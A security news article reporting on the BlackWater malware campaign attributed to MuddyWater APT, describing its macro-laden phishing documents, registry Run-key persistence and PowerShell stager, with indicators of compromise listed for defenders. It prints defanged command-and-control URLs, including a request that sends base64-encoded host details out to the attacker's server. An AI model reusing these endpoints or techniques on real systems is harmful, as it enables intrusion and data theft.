Wednesday, December 25, 2024
HomeMalwareMuddyWater APT's BlackWater Malware Campaign Install Backdoor on Victims PC to Gain...

MuddyWater APT’s BlackWater Malware Campaign Install Backdoor on Victims PC to Gain Remote Access & Evade Detection

Published on

SIEM as a Service

Researchers discovered a “Blackwater” malware campaign that suspected to associated with well known MuddyWater APT bypass the security control and install a backdoor on Victims PC using MuddyWater’s tactics, techniques, and procedures (TTPs).

MuddyWater involved with a various cyber attack in recent past and its spotted to targeting organizations in Pakistan, Turkey, and Tajikistan using multiple social engineering methods to trick the victims into enabling macros and activate payloads.

Blackwater campaign believed to be a new arsenal of MuddyWater APT since the activities indicate that the threat actors applied many tactics within it to improve its operational security and avoid endpoint detection.

- Advertisement - SIEM as a Service

Threat actors using Obfuscated VBA script to establish the persistence mechanism and the VBA script triggered a PowerShell stager, also its a type of method to masquerade as a red-teaming tool.

Backwater also employed a FruityC2 agent script, an open-source framework on GitHub by letting PowerShell stager communicate with C2 server to enumerate the host machine further.

It is one of the methods threat actors employed to make host-based detection more difficult and avoid signature-based detection from Yara rules.

BlackWater Infection Process

Researchers discovered a weaponized document which is being sent to victims via phishing emails with the time stamp that indicates that the document created date on April 23.

Once victims open the malicious document, it required the user to enable the Macro titled “BlackWater.bas”

Threat actors also employed an anti-reverse technique by protecting Macro with a password to inaccessible if a user attempted to view the Macro in Visual Basic.

According to Talos Research, “The macro contains a PowerShell script to persist in the “Run” registry key, “KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding”.

The script then called the file “\ProgramData\SysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.”

This PowerShell agent was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey.

In Blackwater campaign, threat actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file.

Finally PowerShell script Will enumerate the Targeted victims machine to querying following information.

  • Operating system’s name (i.e., the name of the machine)
  • Operating system’s OS architecture
  • Operating system’s caption
  • Computer system’s domain
  • Computer system’s username
  • Computer’s public IP address

Once its enumerate all the information, It proposes the URL post request to a C2 with base64-encoded, whereas in previous versions this information was written to a text file.

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

Later it decode the enumerated data and obtain the stolen data From Victims

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01

Indicators of compromise

Hashes

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad
9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7
0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2
A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da91
6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad
Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6
B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93
4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60
576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf
062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URLs

hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater
hxxp://82[.]102[.]8[.]101/bcerrxy.php?
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/
hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df
hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh
hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Also Read:

Cyber Espionage Campaign Possibly “MuddyWater” Targets Middle East and Central Asia

MuddyWater Malware Attack Launch PowerShell Script to Open Backdoor in Windows PC via MS Word Document

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Indonesia Government Data Breach – Hackers Leaked 82 GB of Sensitive Data Online

Hackers have reportedly infiltrated and extracted a vast 82 GB of sensitive data from...

IBM AIX TCP/IP Vulnerability Lets Attackers Exploit to Launch Denial of Service Attack

IBM has issued a security bulletin warning of two vulnerabilities in its AIX operating...

Apache Auth-Bypass Vulnerability Lets Attackers Gain Control Over HugeGraph-Server

The Apache Software Foundation has issued a security alert regarding a critical vulnerability...

USA Launched Cyber Attack on Chinese Technology Firms

The Chinese National Internet Emergency Center (CNIE) has revealed two significant cases of cyber...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Skuld Malware Using Weaponized Windows Utilities Packages To Deliver Malware

Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer...

BellaCiao, A new .NET Malware With Advanced Sophisticated Techniques

An investigation revealed an intrusion in Asia involving the BellaCiao .NET malware, as the...

Lazarus Hackers Using New VNC Based Malware To Attack Organizations Worldwide

The Lazarus Group has recently employed a sophisticated attack, dubbed "Operation DreamJob," to target...